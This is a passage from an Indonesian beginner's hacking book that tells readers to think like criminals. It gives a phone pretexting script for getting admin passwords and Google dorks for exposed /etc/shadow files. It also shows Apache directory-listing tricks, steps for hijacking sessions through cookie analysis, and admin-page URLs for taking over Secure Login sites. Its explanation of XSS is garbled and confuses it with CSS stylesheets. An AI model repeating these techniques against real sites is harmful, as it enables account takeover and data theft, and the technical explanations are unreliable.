Tetapi dapat juga dengan menggunakan social
engineering.

2.1 Bagaimana Memperoleh Informasi Target

Banyak cara memperoleh informasi tentang


target, yang pertama dengan cara teknis, seperti
mendapatkan informasi IP Address menggunakan ping,
atau mendapatkan informasi tentang Sistem Operasi yang
dipakai oleh server tersebut menggunakan DOS Shell.
Penjelasan memperoleh informasi target secara teknis,
ada pada sub bab sebelumnya.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 49


4 HARI MENJADI HACKER

Ada juga cara lain, yaitu dengan cara non teknis


atau dinamakan social engineering. Dari kata – katanya
sendiri, social engineering adalah sebuah teknik social
untuk mendapatkan suatu informasi. Misalnya untuk
mendapatkan user dan password admin dari suatu
website jika kita menggunakan social engineering kita
memerlukan kemampuan teknis yang mendalam, cukup
menelpon ke kantor representatif situs target, kemudian
kita menyamar menjadi petugas di suatu perusahaan IT
yang sedang melakukan pemeriksaan keamanan. Contoh,
situs www.coba.com yang dimiliki oleh perusahaan
cobacoba mempunyai sistem keamanan website yang
bagus. Sudah beberapa kali anda melakukan penjebolan
di website www.coba.com untuk mencuri file user dan
password admin tetapi tidak berhasil. Anda mencoba
melakukan sosial engineering, yaitu dengan menelepon
admin dari situs www.coba.com , anda mengaku dari
perusahaan penyedia jasa hosting yang menangani
hosting www.coba.com . Karena suatu sebab teknis,
penyedia jasa hosting memerlukan user dan password
admin untuk melakukan suatu pekerjaan yang
menyangkut keamanan website. Admin dari
www.coba.com percaya dan memberikan user dan
password admin. Waw...begitu mudah bukan???
Beberapa hacker yang mempunyai social engineering
yang bagus, salah satunya adalah Kevin Mitnick. Kevin
Mitnick dikenal dengan penjebolan beberapa server
strategis, tetapi sebenarnya dia sendiri menyadari, dia
tidak punya kemampuan teknis yang terlalu bagus, maka
dia mengasah kemampuan social engineering nya untuk

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 50


4 HARI MENJADI HACKER

mendapatkan beberapa informasi penting dari target


tanpa harus melakukan proses teknis yang memakan
waktu dan tenaga.
Banyak jalan lain ke Roma, banyak juga cara
mendapatkan informasi tentang situs target selain
menggunakan cara di atas. Kita dapat menggunakan tools
– tools yang sudah jadi, seperti search engine atau tools
yang ada di internet lainnya.

2.2 Search Engine sebagai Penggali Informasi


yang Powerfull

Search engine atau yang biasa kita kenali sebagai


mesin pencari sangat efektif juga untuk menggali sebuah
informasi suatu situs, bukan hanya informasi tentang IP
Address saja, tetapi kita juga bisa mencari file yang ada
di website tersebut, file password, file penting, top secret
dan lainnya. Dalam kasus ini kita memakai search engine
google atau www.google.co.id . Untuk dapat mencari
sampai file top secret atau rahasia, pasti ada syntax yang
harus dimengerti tentunya.
Kita telah terbiasa menggunakan google untuk
mencari file atau artikel yang berhubungan dengan tugas
kuliah atau pekerjaan. Sebenarnya google dapat
diefektifkan untuk mencari informasi tentang website
bahkan file berisi user dan password.

Syntax – syntax ajaib

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 51


4 HARI MENJADI HACKER

Beberapa syntax ajaib google untuk melakukan pencarian


atau penggalian informasi adalah :

Filetype
Filetype adalah syntax yang berguna untuk mencari file
berekstensi tertentu di dalam website, syntax penulisan
dalam google adalah:

Filetype:ekstensifile [spasi] judul file yang dicari

Contoh:

Filetype:doc keamanan data


Filetype:doc keamanan jaringan
Filetype:xls apa aja
Filetype:sql
Filetype:mdb

misalnya kita ingin mencari file berekstensi .doc dengan


judul keamanan jaringan, maka cukup ketik di google

Filetype:doc keamanan jaringan

Maka akan muncul seperti pada gambar berikut ini:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 52


4 HARI MENJADI HACKER

Gambar 2. 1 Mencari file di google dgn syntax ajaib


Seluruh link yang ada di google akan menampilkan alamat
website yang berisi file berekstensi .doc yang mempunyai
judul ’keamanan jaringan’.

Site
Site berguna untuk memperlihatkan link yang ada di suatu
situs tertentu. Hal ini berguna untuk mepersempit
pencarian. Syntaxnya adalah:

Site:dnssite

Contoh:
Site:com
Site:co.id
Site:net

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 53


4 HARI MENJADI HACKER

Misalnya kita ingin melihat file berekstensi doc yang


punya judul ‘keamanan jaringan’ pada situs yang
berakhiran com, maka penulisan syntaxnya adalah:

Fileyte:doc site:com keamanan jaringan

Maka akan muncul gambar sbb:

Gambar 2. 2 Mencari dokumen dengan syntax filetype

Hasil pencarian google akan menampilkan link yang berisi


file berekstensi doc dan mempunyai judul ’keamanan
jaringan’ yang berada di situs yang berakhiran com.
Misalnya, pada gambar ditunjukkan file tersebut berada
di situs www.ictwatch.com dan r-marpaung.tripod.com

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 54


4 HARI MENJADI HACKER

Inurl
Inurl bisa dianggap sebuah wildcard, bentuk penulisannya
adalah:

Inurl:wildcard

misalnya ingin menampilkan pencarian file yang dimulai


dengan /etc/passwd, maka penulisannya di google
adalah:

inurl:/etc/passwd
inurl:/etc/shadow
inurl:/dev/hdd

/etc/shadow dan /etc/passwd adalah file yang berisi user


password sistem operasi linux, sekarang coba tulis di
google script berikut:

inurl:/etc/shadow

Maka akan muncul seperti pada gambar berikut:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 55


4 HARI MENJADI HACKER

Gambar 2. 3 Mencari file password dengan syntax inurl

Hasil pencarian menampilkan situs yang berisi file


/etc/shadow, klik salah satu linknya, maka akan muncul
gambar sbb:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 56


4 HARI MENJADI HACKER

Gambar 2. 4 Gambar file /etc/shadow pada suatu situs

Waw...sebuah file yang berisi user dan password, tetapi


password tersebut masih dienkripsi. Kita perlu meng-
crack password tersebut agar bisa digunakan, biasanya
memakai John The Ripper, Brutus atau crack password
lainnya. Untuk mendalami tentang pencarian google atau
google dorks anda dapat melihatnya di situs:
http://johnny.ihackstuff.com/index.php?module=prodrev
iews

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 57


4 HARI MENJADI HACKER

HARI KEDUA

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 58


4 HARI MENJADI HACKER

Bab III
Hari Kedua

BERSEMEDI MEMPELAJARI
JURUS – JURUS HACKING

Baik, hari kedua ini, adalah hari bersemedi,


dimana kamu harus melakukan semedi untuk
mempelajari jurus – jurus hacking yang akan kamu
praktekkan saat turun gunung nanti. Silakan dimulai
semedinya nak ..
Selain itu, pada bab ini akan dibahas bagaimana
kita melakukan penetrasi jaringan. Yang jelas pada bab
ini posisikan diri anda sebagai seorang penjahat,
pencoleng atau biasa disebut cracker (black hat hacker),
alasannya agar anda semua mengetahui bagaimana sih
sebenarnya cracker itu bekerja, atau bagaimana pencuri,
penjebol sistem keamanan bekerja. Ikuti saja langkah
atau alirannya, bukan berarti kami disini mengajarkan
suatu kejahatan. Karena jika ingin menjadi polisi yang
handal, maka harus tau cara maling tersebut bekerja, jika
ingin menjadi seorang system administrator yang handal,
maka mau tidak mau kita harus mengetahui bagaimana
seorang cracker bekerja atau melakukan internet abusing
(penyalah gunaan internet).

3.1 Web Application Hacking

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 59


4 HARI MENJADI HACKER

Sebelum melangkah pada bab ini, sebaiknya kita


mengetahui apa yang dinamakan web application.

Web application adalah suatu lapisan yang menjembatani


antara web server dan database. Seperti pada gambar di
bawah, dijelaskan bahwa web application
menghubungkan webserver dan database. Webserver
sendiri itu apa? Webserver adalah server yang
mengandung atau berisi file web. Jadi misalnya anda
mempunyai situs bernama www.anda.com, maka di
server www.anda.com mempunyai fisik sebuah komputer
yang berisi file web untuk ditampilkan di web browser
(Internet Explorer, FireFox Mozilla, Opera) client.

Gambar 3. 1 Lapisan yang menjembatani antara web


server dan database
Sedangkan web application adalah sebagai
penjaga atau yang menyaring masukkan text, string,
character yang dukirimkan oleh user atau client.
Contohnya adalah sebagai berikut, misalnya pada
situs www.google.com, seorang user meminta informasi
tentang link yang berisi tentang buku yang berjudul

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 60


4 HARI MENJADI HACKER

keamanan jaringan. Maka dari komputer client akan


dikirim kata – kata ”buku keamanan jaringan”. Kemudian
dari komputer client, kata – kata tersebut akan diteruskan
ke web server dan web server akan meneruskan ke web
application untuk disaring apakah data yang dari client
atau user valid atau tidak. Jika valid maka akan diteruskan
ke Database, jika tidak maka akan dimentalkan ke web
server lagi dan pada komputer client akan dimunculkan
pesan error, contohnya pada gambar berikut:

Gambar 3. 2 Proser 3 Tier Application

Nah dari sini kita dapat menghacking web


application yaitu dengan menginjek atau memasukkan
data yang tidak valid. Sehingga si web application
tersebut menjadi ’Pusing’ atau bingung karena data yang
kita masukkan, nah jika web application pusing, web
application tersebut akan mengeluarkan data – data yang
seharusnya tidak dikeluarkan. Seperti, user dan password
admin yang seharusnya tidak boleh diperlihatkan kepada

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 61


4 HARI MENJADI HACKER

user biasa. Bisa dimisalkan seperti, ada orang bernama


Fulan, dia mempunyai rahasia yang kita sendiri tidak bisa
mengetahuinya. Untuk mengorek rahasia tersebut, anda
mengajak si Fulan untuk ’minum’ atau memberi minuman
yang mengandung alkohol 90 %. Otomatis si Fulan akan
mabuk, ketika mabuk anda dapat mengorek tentang
rahasia yang disimpan si Fulan.Bukan berarti saya pernah
melakukannya yak... pernah sih sekali, eh dua kali ding!
Eh ... gak kok..halah kok jadi ngaku begini
hyuhyuhyuhyu!!Ketawan deh masa kegelapannyah...

Beberapa web application beserta vendornya:

Gambar 3. 3 Web application beserta vendornya

3.2 Parameter yang Invalid

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 62


4 HARI MENJADI HACKER

Parameter adalah suatu fungsi yang mengikuti


sebuah perintah, misalnya pada DOS (Diskette Operating
System) Shell, untuk memunculkan seluruh file yang ada
di suatu direktori kita memakai perintah DIR. Untuk
memunculkan seluruh file dan folder termasuk
attributnya, kita harus memakai perintah DIR dan
menggunakan parameter /A sehingga bentuk
penulisannya seperti berikut:

DIR /A

Betul tidak? Sedangkan untuk parameter di web server,


sangat banyak sekali saya tidak akan menjelaskannya
satu per satu, jika anda ingin belajar banyak tentang
parameter cukup kunjungi situs di bawah ini:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 63


4 HARI MENJADI HACKER

Gambar 3. 4 Situs yang memuat tentang keterangan


parameter dari vendor dan produknya
Parameter Invalid Pada Apache

Seperti yang anda tahu, apache adalah sebuah


webserver opensource, dikembangkan oleh banyak orang
karena sifatnya yang open source, walaupun begitu tetap
saja masih ada kesalahan – kesalahan atau bug yang

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 64


4 HARI MENJADI HACKER

dapat digali dari web server apache ini, terutama


parameternya. Apache terdiri dari banyak module dan
bug yang paling banyak disalahgunakan pada apache ini
adalah module-nya. Situs E-commerce kebanyakan dibuat
dengan tampilan yang sangat bagus dan bersahabat,
warna – warni di sana – sini, dinamis karena
menggunakan gambar yang bergerak dan lainnya, hal
inilah yang mempengaruhi banyak sedikitnya modul yang
akan dipergunakan oleh Apache.
Penggunaan URL yang panjang dapat
menyebabkan modul di Apache seperti mod_negotiate,
mod_dir dan mod_autoindex memunculkan kesalahan.
Konsepnya sangat mudah sekali tetapi harus melalui ’Trial
dan Error’ atau ’Mencoba dan Gagal’ yang sangat
memerlukan tenaga, pikiran dan waktu.
Konsep contoh dari parameter invalid apache ini
adalah penggunaan pemanggilan direktory yang
menggunakan karakter ’/’ (garis miring) atau tanda slash
yang banyak sekali, penulisannya seperti berikut:

/cgi-
bin///////////////////////////////////////////////////////////////////////
////
/logs////////////////////////////////////////////////////////////////////
/lib//////////////////////////////////////////////////////////////////////
/////////

Contoh:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 65


4 HARI MENJADI HACKER

Sebuah server dengan IP address 192.168.43.13


memakai webserver Apache/1.3.33 (Win32), jika kita
membukanya dengan URL normal
http://192.168.43.13/erstats/erstats , maka situs akan
terbuka normal, seperti pada gambar berikut:

Gambar 3. 5 Situs dengan kesalahan parameter


coba sekarang kita memakai parameter invalid, yaitu
dengan menuliskan :

http://192.168.43.13/erstats///////////////////////////

maka homepage akan terbuka seperti gambar berikut:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 66


4 HARI MENJADI HACKER

Gambar 3. 6 Situs yang terbuka ‘bajunya’ so bisa dilihat


dalamannya uihihihihi….

Yang ditunjukkan pada gambar di atas adalah isi


dari web di server http://192.168.43.13 , jadi bisa dilihat
file – file yang ada di website tersebut. Asik bukan????
Sama seperti anda memakai kacamata tembus pandang
dan melihat pada seseorang yang anda sukai, anda akan
dapat melihat dalam dan DALAMANNYA...wuuu..

3.3 Manipulasi Cookies

Cookies... iyah cookies ... Apaan


tuh???Something like kueh???kue, jajanan pasar, ato apa

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 67


4 HARI MENJADI HACKER

lah???Bukan bukan, kalo di tata boga emang cookies tuh


artinya kue…tapi kalo di dunia komputer, cookies adalah
jejak yang ditimbulkan oleh web yang telah kita kunjungi.
Kalo belum pernah liat coba buka windows explorer,
kemudian ke direktori :

C:\Documents and Settings\NamaUser\Local Settings\Temporary Internet Files

Iya, catatannya direktori NamaUser itu adalah user yang


kalian pakai saat ini, kalau misalnya nama user-nya lynda,
ya berarti diganti aja direktorinya seperti berikut:

C:\Documents and Settings\Lynda\Local Settings\Temporary Internet Files

Kalau nama usernya crystal, ya ganti aja direktorinya


pakek nama itu, kalo bejo ya bejo, kalo burhan ya burhan,
kalo…udah udah….

Nah entar di direktori Temporary Internet File ada banyak


file seperti pada gambar di bawah ini:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 68


4 HARI MENJADI HACKER

Gambar 3. 7 Kumpulan file – file cookies pada direktori


Temporary Internet Files

Coba aja buka salah satu filenya, tapi yang ada tulisan,
Cookie:xxx, misalnya saya akan buka file
Cookie:aat@need2find.com, maka akan kebuka filenya,
sbb:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 69


4 HARI MENJADI HACKER

Gambar 3. 8 Contoh file cookies

Nah itulah file cookies, so kalo kalian sering buka web


friendster, tau kan friendster (hare gene belum buka
friendster!!!) atau email yahoo, maka dikomputer kalian
akan ditelurkan atau ditinggalkan file cookies...gunanya
apa sih???Ya agar dalam satu komputer, ketika ada yang
membuka website yang sama dan perlu login user dan
password, tidak akan ketuker...maksudh loh?!?!?!(loh-
nya kayak bibir nia ramdhani)...ya misalnya kalian punya
laptop, dan laptop tersebut sering dipinjemin ke temen –
temen kalian, sebut saja Aan, Boni dan Cici, buat buka
www.friendster.com , karena kalian membukanya dalam
satu komputer dan biar user friendster kalian tidak
ketuker – tuker, maka si www.friendster.com membuat
cookies di komputer kalian... gitu nah cookies ini disimpan
di direktori yang sudah dijelaskan di atas tadi..NGERTI
KANNNNNNNNN!!!!.... Okeh lanjut...

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 70


4 HARI MENJADI HACKER

Untuk kita akan belajar bagaimana caranya


memanipulasi cookies ini agar dapat digunakan untuk
masuk ke user orang lain tanpa harus menggunakan user
dan password. Ikuti langkah berikut ini aza..

1. Donlot program CookieDigger di

www.foundstone.com

2. Jalankan programnya sampai timbul aplikasi


kayak di bawah ini:

Gambar 3. 9 Aplikasi CookieDigger dari FoundStone

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 71


4 HARI MENJADI HACKER

3. Kemudian tulis website yang ingin anda gali


cookies-nyah, di url bar program tersebut..

Gambar 3. 10 Situs yang bakal digali cookies-nya

Misalnya dalam hal ini saya mengambil contoh:

http://192.168.17.66/B2BTradingPortal/

4. Setelah itu login dengan user dan password yang


sudah anda buat, kalau belum ya...BUAT DULU
USER DAN PASSWORD BARU GITUHHH...

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 72


4 HARI MENJADI HACKER

Gambar 3. 11 Halaman situs ketika sudah login

5. Setelah Login, mohon logout, Loh loh loh.. KOK


GITUUU???Pokoknya ikuti aja dulu ... logout aja
dulu yak!

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 73


4 HARI MENJADI HACKER

Gambar 3. 12 Halaman situs ketika sudah logout

6. Setelah logout, klik tombol , nanti


akan muncul kotak lagi, nah di kotak itu pilih
halaman web yang mengandung cookies

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 74


4 HARI MENJADI HACKER

Gambar 3. 13 CookieDigger menampilkan halaman yang


mengandung cookies

Sampai di kotak bawah atau textbox bawahnya,


memunculkan tulisan seperti gambar berikut:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 75


4 HARI MENJADI HACKER

Gambar 3. 14 User Password yang akan dicompare

7. Ganti tulisan return_path dengan username,


yaitu dengan cara memilih tulisan yang ada di
bawahnya sampai muncul tulisan username,
seperti pada gambar berikut

Gambar 3. 15 Memilih komponen yang mengandung user


dan password

8. Kemudian klik tombol , maka akan


muncul kotak sbb:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 76


4 HARI MENJADI HACKER

Gambar 3. 16 Menambahkan user yang akan dilakukan


peng-compare-an cookies

9. Isikan user dan password yang anda gunakan


untuk login tadi, dengan menggunakan tanda
, isikan minimal dua user, jadi mau
tidak mau anda harus membuat 2 user untuk
website yang akan dicoba.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 77


4 HARI MENJADI HACKER

Gambar 3. 17 melakukan peng-compare-an

10. Klik tombol untuk menambah jumlah cookie


yang akan dikumpulkan, isi aja sampai 10 buah

Gambar 3. 18 Mengkonfigurasi jumlah cookies yang akan


dikumpulkan

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 78


4 HARI MENJADI HACKER

11. Jika sudah terisi klik lagi tombol


sehingga muncul kotak sbb :

Gambar 3. 19 Proses pengumpulan cookies

Tunggu sebentar sampai indikator yang berwarna biru


tersebut penuh.

12. Setelah selesai anda bisa melakukan manual


testing, yaitu dengan cara mengklik tombol
, maka akan muncul kotak sbb:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 79


4 HARI MENJADI HACKER

Gambar 3. 20 Proses Hashing

13. Isikan kotak

Gambar 3. 21 Mengisi string yang ingin dibandingkan


Dengan nama user, kemudian pilih kotak Hashing
Algorithms dengan pilihan ’MD5’

Gambar 3. 22 Memilih metode MD5 untuk compare

14. Kemudian klik tombol untuk


melakukan perbandingan cookies satu dengan

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 80


4 HARI MENJADI HACKER

yang lainnya. Ntar ada kotak peringatan, klik OK


aja.

Gambar 3. 23 Melakukan proses compare


15. Jika muncul kotak amal...maksudnya kotak
peringatan seperti berikut.

Gambar 3. 24 Cookies yang tidak cocok

Berarti cookies tidak cocok..

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 81


4 HARI MENJADI HACKER

16. Kemudian klik tab yang ada didaerah


atas, maka akan muncul kotak sbb :

Gambar 3. 25 Konversi Cookies

17. Isikan Instance number dengan angka 2 dengan


cara memilih combo box-nya angka 2

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 82


4 HARI MENJADI HACKER

Gambar 3. 26 Memilih instant number


Kemudian klik tombol

18. Kemudian klik tab maka akn muncul


kotak sbb :

Gambar 3. 27 Compare cookies menurut user

19. Isikan kotak

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 83


4 HARI MENJADI HACKER

Gambar 3. 28 Kotak string yang akan dibandingkan

Dengan string yang diambil 5 karakter dari kiri dan 21


karakter dari kanan, dengan jumlah yang diambil 6
karakter, maksudnya, misalnya stringnya :

71e784a7a985e5d982dfb3360c647d85

Maka karakter yang diambil adalah

a7a98

Gambar 3. 29 Mengisi string yang akan dibandingkan

ngerti kan...... kemudian klik tombol

20. Jika muncul pesan

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 84


4 HARI MENJADI HACKER

Gambar 3. 30 Cookies yang cocok ada 20 kali

BINGGO!!!!Kalian dapat cookiesnyah....silahkan klik


menu Show Report, kemudian klik Generate Report,
maka akan kelihatan reportnya sbb:

Gambar 3. 31 Meng-generate report

21. Maka kalian akan mendapatkan laporan cookies


yang sudah pernah memasuki web tadi

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 85


4 HARI MENJADI HACKER

Gambar 3. 32 Laporan atau report yang dihasilkan dari


program CookieDigger

CookiesDigger tidak dapat berjalan pada:


1. Website yang meminta scripting di value
parameter sebelum value tersebut dikirim balik ke
aplikasi
2. Website yang mengirim dan meminta cookies
hanya sekali setiap login baru.

3.4 Cross Side Scripting (XSS)

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 86


4 HARI MENJADI HACKER

Cross Side Scripting atau yang biasa disebut


XSS… apaan tuh???? Umh ….Perumpamaannya gimana
yah??? Sebenarnya suatu yang simple sih … tapi jika
dibiarkan dapat mengganggu website anda.
Jadi teknisnya sebagai berikut, tiap website
mempunyai file yang berekstensi .css atau kepanjangan
aslinya adalah client side scripting. Gunanya adalah untuk
melakukan setting, huruf, warna halaman atau seluruh
pekerjaan yang berhubungan dengan jenis huruf dan
warna yang dilakukan pada web browser client. Selain itu
juga agar kinerja atau kerja server website tidak terlalu
berat. Ilustrasinya seperti ini :

(4) (5)

(1)

SERVER (2) (3) CLIENT

(1) Client meminta server untuk menampilkan website


di layar komputer client ... ya contohnya ketika
anda membuka www.yahoo.com maka yang tampil
akan website yahoo kan, bukan website lalatx gituh

(2) Server menerima permintaan dan mengirimkan file


halaman yang ingin dibuka. Tetapi karena website

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 87


4 HARI MENJADI HACKER

tersebut memakai sistem CSS seperti yang dijelas


di paragraf sebelumnya, server mengirim file .css
tersebut.

(3) file .css didonlot dan disimpan di komputer client,


biasanya di direktori “C:\Documents and
Settings\NamaUser\Local Settings\Temporary
Internet Files”.

(4) Kemudian server mengirimkan tampilan halaman


depan.

(5) Pada komputer client akan tampil tulisan, warna


form dan jenis huruf sesuai dengan settingan file
.css yang di-download.

Nah karena CSS ini juga merupakan sebuah


sesuatu yang bisa diiseng – isengin juga (halah
bahasanya pemaksaan) … maka para ahli sekuriti
jaringan meneliti dan mengembangkan bahwa css bisa
juga dimasukkan sebagai salah satu lubang sekuriti yang
ada. Kalian bisa kok mengoprek – ngoprek (meneliti) css
itu sendiri. Tinggal sambung laptop or komputer ke
internet, kemudian cari di direktori ”C:\Documents and
Settings\NamaUser\Local Settings\Temporary Internet
Files” file yang berekstensi .css, kemudian ubah – ubah
aja isinya, tapi jangan asal ubah euy ... misalnya di file
.css tersebut ada baris:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 88


4 HARI MENJADI HACKER

Font = arial

Nah ubah aja menjadi:

Font = Times new Roman

Otomatis website yang kalian akses tadi font atau


hurufnya akan berubah dari Arial menjadi Times new
Roman.

3.5 Kesalahan Konfigurasi Aplikasi Web dan


Server

Wuahhhhh... teknik berikutnya ini agak panjang


yah ... yaitu teknik memanfaatkan kesalahan konfigurasi
aplikasi web dan server. Umh memanfaatkan kesalahan
atau kelemahan ... kayaknya asik tuh ... pengandaiannya
seperti ini ... kita punya teman, teman sepermainan ...
(halah kayak lagu ratu) ... pokoknya anda punya teman
... sebut saja namanya Bondet (kayak gak ada nama lain
aja mas ...). Bondet ini kalau di rumah baik, sehingga
orang tuanya mengecap dia sebagai anak baik, tapi di luar
rumah ....wuahhhhh bondet itu seorang pejudi, peminum
dan tukang main perem... tukang main sepeda ajah lah
... orang tua Bondet gak suka kalau anaknya itu seorang
pejudi, peminum dan tukang main sepeda, tapi anda tau
Bondet itu sebenarnya siapa.... Nahhhhh dari sini anda
bisa memanfaatkan kesalahan Bondet ... “Bondet kalau
kamu gak mau menuruti perintah saya, akan saya

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 89


4 HARI MENJADI HACKER

laporkan ke orang tuamu ...” ,ancam anda. Bondet pun


ketakutan dan mau melakukan apa yang diperintahkan
oleh anda.
Lah terus hubungannya apa sama aplikasi web
dan server??? Ya... Sama seperti aplikasi web dan server.
Di server ada aplikasi sebut saja namanya Secure Login
v1.0 . Anda tahu kesalahan dari Secure Login itu, nah dari
situ anda dapat memanfaatkan kesalahan aplikasi
tersebut untuk mengubek – ubek (menjahili) server orang
yang di sana terpasang aplikasi Secure Login. Ngerti kan
... dari sini anda harus mengerti dahulu apa yang
dinamakan Secure Login. Sama seperti Bondet, anda
harus tau Bondet itu orangnya gimana dulu kan untuk
mengetahui hobinya yang aneh – aneh yaitu tukang judi,
tukang mabok dan main perem... sepeda itu ... tul gak
... okeh kita bahas Secure login dulu yak ...

SECURE LOGIN V1.0

Secure Login adalah sebuah aplikasi server diman


user dapat mengakses halaman web yang terproteksi oleh
password. Aplikasi ini menghindari akses yang tidak
terotorisasi yang dilakukan oleh user jalang (halah) untuk
masuk ke suatu situs. Dan langsung mengalihkan user
jalang atau user yang tidak bertanggung jawab yang ingin
mengambil alih website kita ke halaman error atau
biasanya halaman login.
Secure Login terdiri dari tiga tingkatan user, yaitu:

1. Admin

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 90


4 HARI MENJADI HACKER

Admin adalah tingkatan tertinggi dari aplikasi


Secure Login. Admin bisa menguasai website
yang telah dipasangi aplikasi Secure Login. Jika
anda menjadi user dengan tingkat Admin ini anda
bisa melakukan apa saja di website tersebut. Ya...
seperti presiden-nya lah.

2. Member
Member adalah tingkat yang tertinggi setelah
admin. User dengan tingkat member hanya dapat
mengerjakan beberapa perintah, misalnya
ahanya dapat mengirim pesan langsung ke admin
dan menerima pesan yang dikirimkan oleh admin.
Kalau di negara ya... dimisalkan seperti warga
negara lah.

3. Visitor
Terakhir adalah user dengan tingkatan paling
rendah, yaitu visitor. User ini hanya dapat melihat
web tanpa bisa mengirim pesan ke admin. Kalau
di negara ya dimisalkan turis dari luar negri
gituh.. ngertikan....

Secure Login terdiri dari 3 halaman utama, yaitu:

1. Halaman List atau daftar para user dengan


tingkatan member atau admin. Fungsi dari
halaman ini adalah untuk me-manage user
dengan tingkatan admin dan member.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 91


4 HARI MENJADI HACKER

Gambar 3. 33 Aplikasi Secure Login di web browser


mozilla

2. Halaman Untuk melakukan konfigurasi sekuriti,


fungsi dari halaman ini adalah untuk melakukan
konfigurasi sekuriti pengalihan halaman, ketika
admin login atau logout, ketika member login
atau logout, dan pengalihan halaman untuk user
jalang atau user yang tidak bertanggung jawab
yang mencoba masuk ke website kita.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 92


4 HARI MENJADI HACKER

Gambar 3. 34 Konfigurasi pengalihan halaman pada


Secure Login

3. Halaman untuk melakukan konfigurasi pesan jika


user lupa akan passwordnya. Yang terdiri dari
Konfigurasi email admin, pesan dan judul pesan.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 93


4 HARI MENJADI HACKER

Gambar 3. 35 Konfigurasi pesan lupa password untuk


user pada aplikasi Secure login
Saya anggap anda paling tidak sudah tahu tentang
aplikasi secure login, lalu kesalahannya dimana?Okay ...
kesalahan pada Secure Login ini ada pada beberapa script
default, atau script yang disediakan Secure login untuk
mempermudah kerja admin atau administrator. Script –
script tersebut adalah:

/set_preferences.asp

/send_password_preferences.asp
/SecureLoginManager/list.asp

/set_preferences.asp

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 94


4 HARI MENJADI HACKER

Script ini jika tidak dikonfigurasi dengan benar, maka


akan menampilkan halaman web konfigurasi sekuriti,
seperti yang diterangkan di atas, yaitu di nomor 2. Cara
menampilkan halaman ini sangat gampang, sintaksnya
seperti dibawah ini, kita mengambil contoh untuk site-nya
adalah www.target.com :

http://www.target.com/admin/SecureLoginMan
ager/set_preferences.asp

Jika alamat web diatas dituliskan di web browser anda


(Mozilla atau Internet Eksplorer, maka akan tampil
halaman dari aplikasi Secure Login sbb:

Gambar 3. 36 Akibat yang ditimbulkan karena kesalahan


setting pada modul /set_preferences.asp
Halaman Secure Login ini bisa disalahgunakan untuk
melihat, dimana aplikasi Secure Login itu berada dan
halaman mana yang dijadikan pengalihan untuk user
jalang atau user yang tidak bertanggung jawab.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 95


4 HARI MENJADI HACKER

/send_password_preferences.asp

Script ini berguna untuk menampilkan halaman


konfigurasi email admin dan isi pesan dari email kalau si
user tingkat member lupa passwordnya. Untuk
menampilkan halaman tersebut, cukup tulis sintaks
berikut ini di web browser anda:

http://www.target.com/admin/SecureLoginManager
/send_password_preferences.asp

Maka akan muncul halamannya seperti gambar berikut:

Gambar 3. 37 Akibat yang ditimbulkan karena kesalahan


setting pada modul /set_password_preferences.asp

Nah dari sini bisa disalahgunakan untuk mengalihkan


email admin ke email kita, kemudian mengganti pesan
email yang dikirimkan oleh admin dengan pesan email
kita.

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 96


4 HARI MENJADI HACKER

/SecureLoginManager/list.asp

Yang terakhir adalah script untuk menampilkan daftar


user dengan tingkat member atau admin, waw waw ...
edun lah ... kita bisa tau user dan password admin, email
admin, bahkan kita bisa memasukkan sendiri diri kita
menjadi admin atau member, ya yang pastinya kalau
udah bisa masukkin diri anda otomatis anda pengin
didaftar sebagai admin kan...hayo ngaku .... ya siapa sih
yang gak mau, masuk ke sebuah perusahaan langsung
jadi bos ... iya gak ... Sintaks untuk menampilkan halaman
itu dapat ditulis di web browser anda sbb:

http://www.target.com/admin/SecureLoginMan
ager/list.asp

Maka akan muncul halamannya sbb:

Sekuriti Dilihat Dari Sudut Pandang Hacker dan Maling 97


4 HARI MENJADI HACKER

